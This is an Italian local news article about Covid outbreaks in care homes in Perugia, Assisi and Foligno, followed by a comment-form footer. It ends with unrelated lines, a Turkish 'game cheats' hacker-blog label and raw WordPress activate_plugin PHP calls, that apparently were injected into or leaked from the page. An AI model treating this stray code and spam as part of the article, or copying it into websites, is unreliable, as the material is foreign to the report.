Emergenza Covid, crescono ancora i contagi negli ospizi e nelle Rsa dell’Umbria



Case protette, residenze assistite e case di riposo sono al momento le realtà più critiche in Umbria. Martedì al Fontenuovo di Perugia si sono registrati altri casi di positività. Nel week end c’è stato anche il decesso di un’anziana ospite che era stata portata in ospedale.Ma non è l’unico caso. E’ di ieri la notizia che alla casa di riposo “Andrea Rossi” di Assisi due anziani ospiti sono risultati positivi al Covid. “Immediatamente”, è scritto in una nota dell’ente, “sono state attivate tutte le azioni previste dalle procedure e, d’accordo con la Usl Umbria. I due ospiti risultati positivi al Covid non presentano ad oggi sintomatologia grave”. Sono state riscontrate alcune positività anche presso la casa di riposo della Fondazione Opera Pia Bartolomei Castori di Foligno. In accordo con l’Usl, disposti tamponi per tutti e creata un’aera Covid per garantire la sicurezza agli ospiti.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Hacker Blog Oyun Hileleri

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );